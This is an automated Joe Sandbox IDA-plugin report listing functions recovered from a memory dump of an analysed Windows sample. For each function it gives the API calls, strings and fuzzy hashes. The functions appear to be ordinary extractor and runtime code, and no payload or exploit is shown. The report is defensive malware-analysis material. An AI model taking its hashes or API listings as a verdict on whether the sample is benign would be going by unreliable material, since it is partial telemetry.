Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 184ed2d846a860403d83fd259663be7141ec14eee42dd143de4a156d78255199
Instruction ID: 6b1c6dd975ba48c7486b42936090d2a41e0e2add4c0d77fdb663ab3a4726a1f1
Opcode Fuzzy Hash: 184ed2d846a860403d83fd259663be7141ec14eee42dd143de4a156d78255199
Instruction Fuzzy Hash: 8FA011C22AC0A83C300832A02E02C3B030CC8C0B22332E22FF800C82C0A880082828B0

Function 00DDE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDE51F

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a12d18f1e4038827b914945ff353de15271a01e7dd2a1e4e15b35608a5a426d
Instruction ID: e47ce98cfd3af5217a15aa6d8a9cd62b60e046e87deca23194ba18368624b544
Opcode Fuzzy Hash: 6a12d18f1e4038827b914945ff353de15271a01e7dd2a1e4e15b35608a5a426d
Instruction Fuzzy Hash: A8A011C22AC08ABC300832002E02C3B030CC0C2FA0330A82FF802CC280A8800C0828B0

Function 00DC9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00DC903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00DC9F0C

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 2b130bf89f8816dbf9633bc0f620fb27fcbec7c8b908f8c0483e8b82315f1052
Instruction ID: aab0cf6199a47fca94bb85241dbee8e2718e8e473a18437b1a176be9b4960575
Opcode Fuzzy Hash: 2b130bf89f8816dbf9633bc0f620fb27fcbec7c8b908f8c0483e8b82315f1052
Instruction Fuzzy Hash: D6A0223008020E8BCE802F30CE0802C3B20FB20BC030282E8A00BCF0B2CF23880BCB20

Function 00DDAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00DDAE72,C:\Users\user\Desktop,00000000,00E0946A,00000006), ref: 00DDAC08

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 7e91c2f058c59d29ad57afdbde776f11b651b40a4b5bab374e6e07e06a32de8b
Instruction ID: a0c43348cc14c2b87788faf67c9ceb9e2cb27e3d8d871e53a36eb5ba3f749ace
Opcode Fuzzy Hash: 7e91c2f058c59d29ad57afdbde776f11b651b40a4b5bab374e6e07e06a32de8b
Instruction Fuzzy Hash: 3BA011302003008B82000B328F0AA0EBAAAAFA2B00F02C028A000C0230CB30C8A0EA20

Function 00DC9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00DC95D6,?,?,?,?,?,00DF2641,000000FF), ref: 00DC963B

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f9ff39f131d7fb91c07bdfcb10a9c60ec028c65e34f671f1c66dee724ab1a75c
Instruction ID: d9e8fd8f7d98490c2f46822c1d50041ca9a2ffe619c596c96aaac588cd98a0ca
Opcode Fuzzy Hash: f9ff39f131d7fb91c07bdfcb10a9c60ec028c65e34f671f1c66dee724ab1a75c
Instruction Fuzzy Hash: 88F082704C1B169FDB308A64C46CF92F7E8AB12321F085B1ED0E7539E0D771A98DCA60

Non-executed Functions

Function 00DDC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC1316: GetDlgItem.USER32(00000000,00003021), ref: 00DC135A
Part of subcall function 00DC1316: SetWindowTextW.USER32(00000000,00DF35F4), ref: 00DC1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00DDC2B1
EndDialog.USER32(?,00000006), ref: 00DDC2C4
GetDlgItem.USER32(?,0000006C), ref: 00DDC2E0
SetFocus.USER32(00000000), ref: 00DDC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00DDC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00DDC358
FindFirstFileW.KERNEL32(?,?), ref: 00DDC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DDC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DDC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00DDC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DDC3D4
_swprintf.LIBCMT ref: 00DDC404

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00DDC417
FindClose.KERNEL32(00000000), ref: 00DDC41E
_swprintf.LIBCMT ref: 00DDC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00DDC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00DDC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00DDC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DDC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00DDC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00DDC509
_swprintf.LIBCMT ref: 00DDC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00DDC548
_swprintf.LIBCMT ref: 00DDC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00DDC5AF

Part of subcall function 00DDAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00DDAF35
Part of subcall function 00DDAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00DFE72C,?,?), ref: 00DDAF84

Strings

%s %s, xrefs: 00DDC469, 00DDC58E
REPLACEFILEDLG, xrefs: 00DDC247
%s %s %s, xrefs: 00DDC3F2, 00DDC527

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 88d3fc8666c645cf187b91395bfb90d8e729e417e9e3219d95e8c0a878bd2cf2
Instruction ID: b5228bd3c0a141a40427ca2a1a5d26f7a661712fd676b4ef8204f3ddc7f6449e
Opcode Fuzzy Hash: 88d3fc8666c645cf187b91395bfb90d8e729e417e9e3219d95e8c0a878bd2cf2
Instruction Fuzzy Hash: A4916272158349BFD2319BA0DC49FFB7BACEB49700F04481AB789D6181DA75A609CB72

Function 00DC6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC6FAA
_wcslen.LIBCMT ref: 00DC7013
_wcslen.LIBCMT ref: 00DC7084

Part of subcall function 00DC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DC7AAB
Part of subcall function 00DC7A9C: GetLastError.KERNEL32 ref: 00DC7AF1
Part of subcall function 00DC7A9C: CloseHandle.KERNEL32(?), ref: 00DC7B00

Part of subcall function 00DCA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00DC977F,?,?,00DC95CF,?,?,?,?,?,00DF2641,000000FF), ref: 00DCA1F1
Part of subcall function 00DCA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00DC977F,?,?,00DC95CF,?,?,?,?,?,00DF2641), ref: 00DCA21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00DC7139
CloseHandle.KERNEL32(00000000), ref: 00DC7155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00DC7298

Part of subcall function 00DC9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00DC73BC,?,?,?,00000000), ref: 00DC9DBC
Part of subcall function 00DC9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00DC9E70

Part of subcall function 00DC9620: CloseHandle.KERNELBASE(000000FF,?,?,00DC95D6,?,?,?,?,?,00DF2641,000000FF), ref: 00DC963B

Part of subcall function 00DCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DCA325,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA501
Part of subcall function 00DCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DCA325,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00DC6FCC
\??\, xrefs: 00DC702B
SeRestorePrivilege, xrefs: 00DC6FC2
UNC\, xrefs: 00DC7051

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: 5ec9b889d8db9e09262eea5bc6db8ca58b4c1d13f591a721e04b04ebe530e380
Instruction ID: c2cb3a5cb499c48a7cadf0cf9314f866fea4784ef7ef5f753b1ea259d34ddf16
Opcode Fuzzy Hash: 5ec9b889d8db9e09262eea5bc6db8ca58b4c1d13f591a721e04b04ebe530e380
Instruction Fuzzy Hash: AEC1C571904656AADB25EB74CC42FEEB7A8EF04300F04455EFA56E7282DB34EA44CB71

Function 00DED8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00DEDA34

Strings

1#INF, xrefs: 00DEEC41
1#QNAN, xrefs: 00DEEC3A
1#IND, xrefs: 00DEEC2C
1#SNAN, xrefs: 00DEEC33

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f4540c73d3a2b25d220cbec83443921979a83b1b080f7a19aff733f57c0df951
Instruction ID: 0f9a3fa73d82231f21edc7845e8fdf339a82ac67fcb24e7053865d5c1469139f
Opcode Fuzzy Hash: f4540c73d3a2b25d220cbec83443921979a83b1b080f7a19aff733f57c0df951
Instruction Fuzzy Hash: 17C27E71E046688FDB25EF29DD407EAB7B5EB84304F1841EAD44EE7241E774AE818F60

Function 00DC32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC3300
_swprintf.LIBCMT ref: 00DC36C7

Strings

hc%u, xrefs: 00DC370A
h%u, xrefs: 00DC36BC
CMT, xrefs: 00DC3A17

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 0e30f91dcef19756a9ccb4d516b261ad5e6abfe4bf6d0aa167f17758c95f7ef6
Instruction ID: 4df9e9b7a43651516fd61214885aac1396124634eafc2bc3283fc8fc2721f239
Opcode Fuzzy Hash: 0e30f91dcef19756a9ccb4d516b261ad5e6abfe4bf6d0aa167f17758c95f7ef6
Instruction Fuzzy Hash: 7232A271514386ABDB18DF74C895FE93BA5EF15300F08857DFD8A8B282DA709A49CB70

Function 00DC286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC2874
_strlen.LIBCMT ref: 00DC2E3F

Part of subcall function 00DD02BA: __EH_prolog.LIBCMT ref: 00DD02BF

Part of subcall function 00DD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00DCBAE9,00000000,?,?,?,00010466), ref: 00DD1BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DC2F91

Strings

CMT, xrefs: 00DC2FBC

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: e6046c715c9f0d134fc75266d975e0f36a5c23d8359f27474d5c9b411d0a8f2a
Instruction ID: 9320eb0fa7329ae95c6a06b2e315d18c824c61b25b9f967380a44ddca951391d
Opcode Fuzzy Hash: e6046c715c9f0d134fc75266d975e0f36a5c23d8359f27474d5c9b411d0a8f2a
Instruction Fuzzy Hash: 2462D2715002468FDF19DF78C886BFA7BA1EF54300F08857EED9A8B282DA759945CB70

Function 00DDF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DDF844
IsDebuggerPresent.KERNEL32 ref: 00DDF910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DDF930
UnhandledExceptionFilter.KERNEL32(?), ref: 00DDF93A

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 7c74262e2d6ae94a065b55c2ac3291be8c483e09045e2ae40dc2ef62032832d5
Instruction ID: 30c9c2afd95f63dcebc125d22a5edf154796671ee1514074687fef8bcff48307
Opcode Fuzzy Hash: 7c74262e2d6ae94a065b55c2ac3291be8c483e09045e2ae40dc2ef62032832d5
Instruction Fuzzy Hash: B9310775D053199BDB20DFA4D9897CCBBB8AF08304F1040AAE40DAB350EB719A88CF65

Function 00DDE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,00DDE5E8,0000001C,00DDE7DD,00000000,?,?,?,?,?,?,?,00DDE5E8,00000004,00E21CEC,00DDE86D), ref: 00DDE6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00DDE5E8,00000004,00E21CEC,00DDE86D), ref: 00DDE6CF

Strings

D, xrefs: 00DDE6C3

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: d7a0b410c4c1976e1d1d38ee4a5c1b6cd33703e864c2e6ebfd1ee6edf3db0bfa
Instruction ID: 3fc2fcfa1fee21568c383c4ad4a1ef194ec38294b226cabdd693d57a70db2ec4
Opcode Fuzzy Hash: d7a0b410c4c1976e1d1d38ee4a5c1b6cd33703e864c2e6ebfd1ee6edf3db0bfa
Instruction Fuzzy Hash: 9B01F7326402096BDB14EE29DC09BED7BBAAFC4324F0CC121ED19DB250D634D905C6A0

Function 00DE8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00DE8FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00DE8FBF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00DE8FCC

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 733bfd77e2c5a7b56e09ead62260777e35c0c31ee617d1a684f61e3937997f38
Instruction ID: ffa22bc283390943d742eea110749015e44374255becef6c769a4503dd639ee3
Opcode Fuzzy Hash: 733bfd77e2c5a7b56e09ead62260777e35c0c31ee617d1a684f61e3937997f38
Instruction Fuzzy Hash: 35319375901319ABCB21DF69D889B9DBBB8EF08310F5041EAE41CA6350EB709F858F65

Function 00DED440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: 9e54e638680f988802067105280ab355b7e846eb87ca4ae1b506c8fb12950692
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 36020E71E002599FDF14DFA9C9806ADB7F2EF48314F19816AD919E7384DB31AD41CBA0

Function 00DDAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00DDAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,00DFE72C,?,?), ref: 00DDAF84

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: db536a82eb27e8190f6b4546d155aa8726de2534ec04377a8f236fd191ffe952
Instruction ID: d4e5624fba2d5ba84f31a6e693301a69a71a088b065c4131a7f9d8e437d581c8
Opcode Fuzzy Hash: db536a82eb27e8190f6b4546d155aa8726de2534ec04377a8f236fd191ffe952
